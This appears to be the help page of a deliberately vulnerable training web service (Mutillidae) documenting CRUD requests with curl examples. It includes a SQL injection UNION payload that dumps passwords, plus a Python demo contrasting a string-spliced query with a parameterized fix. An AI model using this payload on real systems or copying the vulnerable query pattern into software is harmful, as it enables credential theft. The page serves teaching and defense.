REST Services Home Page

Welcome to the User Account Web Service

This service allows you to create, read, update, and delete user accounts using various HTTP methods.

Note: This service is vulnerable to SQL injection at security level 0. Be cautious when testing or exploring its functionality.


Supported HTTP Methods

1. GET (Retrieve Data)

Use GET requests to retrieve information about one or more accounts.

Optional Parameter: username (URL query parameter; restricts the result to that account, and is omitted to retrieve all accounts)

Examples:

2. POST (Create New Account)

Use POST requests to create a new user account.

Required Parameters (POST body): username, password, firstname, lastname (as used in the example below)

Optional Parameter: signature (User's signature)

Example:
POST /webservices/rest/ws-user-account.php HTTP/1.1
Host: mutillidae.localhost
Content-Type: application/x-www-form-urlencoded

username=john&password=pass123&firstname=John&lastname=Doe&signature=JDoe

cURL Example:
curl -X POST "http://mutillidae.localhost/webservices/rest/ws-user-account.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=john&password=pass123&firstname=John&lastname=Doe&signature=JDoe"

3. PUT (Create or Update Account)

Use PUT requests to create a new user account or update an existing one.

Required Parameters (request body): username, password, firstname, lastname (as used in the example below)

Optional Parameters: signature, update_client_id, update_client_secret (as used in the example below)

Example:
PUT /webservices/rest/ws-user-account.php HTTP/1.1
Host: mutillidae.localhost
Content-Type: application/x-www-form-urlencoded

username=john&password=newpass123&firstname=John&lastname=Doe&signature=JDoeUpdated&update_client_id=true&update_client_secret=false

cURL Example:
curl -X PUT "http://mutillidae.localhost/webservices/rest/ws-user-account.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=john&password=newpass123&firstname=John&lastname=Doe&signature=JDoeUpdated&update_client_id=true&update_client_secret=false"

4. DELETE (Remove Account)

Use DELETE requests to delete an existing user account.

Required Parameters (request body): username, password (as used in the example below)

Example:
DELETE /webservices/rest/ws-user-account.php HTTP/1.1
Host: mutillidae.localhost
Content-Type: application/x-www-form-urlencoded

username=john&password=newpass123

cURL Example:
curl -X DELETE "http://mutillidae.localhost/webservices/rest/ws-user-account.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=john&password=newpass123"

Example Exploits (SQL Injection)

This service is vulnerable to SQL injection at security level 0 because the username parameter is inserted directly into the SQL query text. Example request:

GET /webservices/rest/ws-user-account.php?username=jeremy'+union+select+concat('The+password+for+',username,'+is+',password),mysignature+from+accounts+-- HTTP/1.1
Host: mutillidae.localhost
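The request above works because, at security level 0, the service splices the username parameter into the SQL statement, so a single quote closes the string literal and the rest of the value is parsed as SQL. The following Python script is an added example (not code from Mutillidae) that reproduces that mechanism against an in-memory SQLite stand-in for the accounts table and places the parameterized form of the same lookup beside it. The table rows are constructed, the column names follow the page (username, password, mysignature), and the payload is the page's one reduced to its quote/UNION/comment core with the MySQL-specific concat() call dropped so that it runs on SQLite.

```python
import sqlite3

# Constructed sample rows standing in for the service's `accounts` table; the
# column names (username, password, mysignature) are the ones used on the page.
SAMPLE_ACCOUNTS = [
    ("jeremy", "jeremy-pass-1", "sig-jeremy"),
    ("john", "john-pass-2", "sig-john"),
    ("jane", "jane-pass-3", "sig-jane"),
]


def make_db():
    """Build an in-memory SQLite stand-in for the accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (username TEXT, password TEXT, mysignature TEXT)"
    )
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ACCOUNTS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, username):
    """Security-level-0 style lookup: the parameter is spliced into the SQL text.

    Whatever the caller sends as `username` becomes part of the statement, so a
    quote ends the literal and the remainder is executed as SQL.
    """
    sql = (
        "SELECT username, mysignature FROM accounts "
        f"WHERE username = '{username}'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username):
    """Hardened lookup: a bound parameter is treated as data, never as SQL syntax."""
    sql = "SELECT username, mysignature FROM accounts WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# The page's GET payload reduced to its mechanism (quote, UNION, comment) and
# adapted for SQLite: two selected columns to match the original SELECT.
PAYLOAD = "x' UNION SELECT username, password FROM accounts -- "


def demo():
    """Return (normal lookup, vulnerable lookup with payload, hardened lookup with payload)."""
    conn = make_db()
    normal = lookup_parameterized(conn, "jeremy")   # one matching row
    leaked = lookup_vulnerable(conn, PAYLOAD)       # every (username, password) pair
    blocked = lookup_parameterized(conn, PAYLOAD)   # no account is literally named that
    return normal, leaked, blocked


if __name__ == "__main__":
    normal, leaked, blocked = demo()
    print("normal lookup:           ", normal)
    print("vulnerable + payload:    ", leaked)
    print("parameterized + payload: ", blocked)
```

Running the script shows the vulnerable lookup returning every username/password pair through the second column of the UNION, while the parameterized lookup returns no rows for the same input because the whole payload is compared as a literal username. The fix for the real service is the same: bind the parameter with a prepared statement rather than building the query string.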